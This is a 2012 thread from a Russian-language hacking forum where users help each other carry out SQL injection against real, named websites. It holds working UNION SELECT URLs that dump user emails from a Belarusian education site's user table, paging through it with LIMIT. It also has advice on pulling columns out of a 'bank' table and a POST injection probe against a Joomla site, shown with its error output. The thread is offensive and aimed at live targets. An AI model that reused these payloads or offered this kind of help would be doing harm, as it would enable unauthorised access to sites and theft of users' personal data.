ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.03.2012, 21:13
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от qaz
qaz said:
как базу выкачать?
памяти не хватает для этого запроса. юзай лимит.
http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,user_email,5,6,7,8,9,10,11 ,12+from+kp_users+limit+1350--+
http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,user_email,5,6,7,8,9,10,11 ,12+from+kp_users+limit+1350,1482--+
т.к.
http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,count(user_email),5,6,7,8, 9,10,11,12+from+kp_users--+
а запрос прерывается ~ в показанном мной промежутке.
|
|
|
06.03.2012, 23:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
1172
Репутация:
0
|
|
Возникла проблема со скулью... Пошерстил форум, вроде ничего не нашел(
Вообщем: есть скуль http://xxx.xx/xxx.php?num=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
в интересующей базе названия столбцов id,1,2,3... при таком запросе http://xxx.xx/xxx.php?num=-1+UNION+SELECT+group_concat(id,0x3A,2,0x3A,1+SEPAR ATOR+0x0b),2,3,4,5,6,7,8,9,10,11+FROM+xxx.bank возвращает строки вида (ид):2:1
То есть ид вытаскивает корректно, а остальные поля выводит числами указанными... как по другому обратиться к этим столбцам?
|
|
|
|
06.03.2012, 23:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от nikaw87
nikaw87 said:
Возникла проблема со скулью... Пошерстил форум, вроде ничего не нашел(
Вообщем: есть скуль http://xxx.xx/xxx.php?num=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
в интересующей базе названия столбцов id,1,2,3... при таком запросе http://xxx.xx/xxx.php?num=-1+UNION+SELECT+group_concat(id,0x3A,2,0x3A,1+SEPAR ATOR+0x0b),2,3,4,5,6,7,8,9,10,11+FROM+xxx.bank возвращает строки вида (ид):2:1
То есть ид вытаскивает корректно, а остальные поля выводит числами указанными... как по другому обратиться к этим столбцам?
Указать имя поля вместо id?
Зы. а вообще нихрена не понял...
|
|
|
|
07.03.2012, 00:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
1172
Репутация:
0
|
|
я не могу вытащить значения колонок 1 2 3... при обращении к ним, возвращает число-имя колонки
|
|
|
|
07.03.2012, 00:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
1245
Репутация:
0
|
|
This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.
Код:
Code:
task=category§ionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54
To get the error I used HackBar for Firefox, I put in this first:
Код:
Code:
http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html
Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):
Code:
Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344
How to inject next ??? |
|
|
|
07.03.2012, 00:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от nikaw87
nikaw87 said:
я не могу вытащить значения колонок 1 2 3... при обращении к ним, возвращает число-имя колонки
Если mq=off, то юзай `1` и т.п.
|
|
|
|
07.03.2012, 00:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
1172
Репутация:
0
|
|
Сообщение от Melfis
Melfis said:
Если mq=off, то юзай `1` и т.п.
во, другое дело) спасибо =)
|
|
|
|
07.03.2012, 15:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от d4rkn3ss
d4rkn3ss said:
This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.
Код:
Code:
task=category§ionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54
To get the error I used HackBar for Firefox, I put in this first:
Код:
Code:
http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html
Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):
Code:
Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344
How to inject next ??? Это русскоязычный форум. Пишите по-русски.
|
|
|
|
07.03.2012, 15:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
тут что-нибудь можно вытянуть?
_http://weddings-kl.sunwayhotels.com/guest/guest.asp?type=./
|
|
|
|
07.03.2012, 15:36
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от er9j6@
er9j6@ said:
тут что-нибудь можно вытянуть?
_http://weddings-kl.sunwayhotels.com/guest/guest.asp?type=./
нет.
зы: а что ты хотел показать точкой со слешем?)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
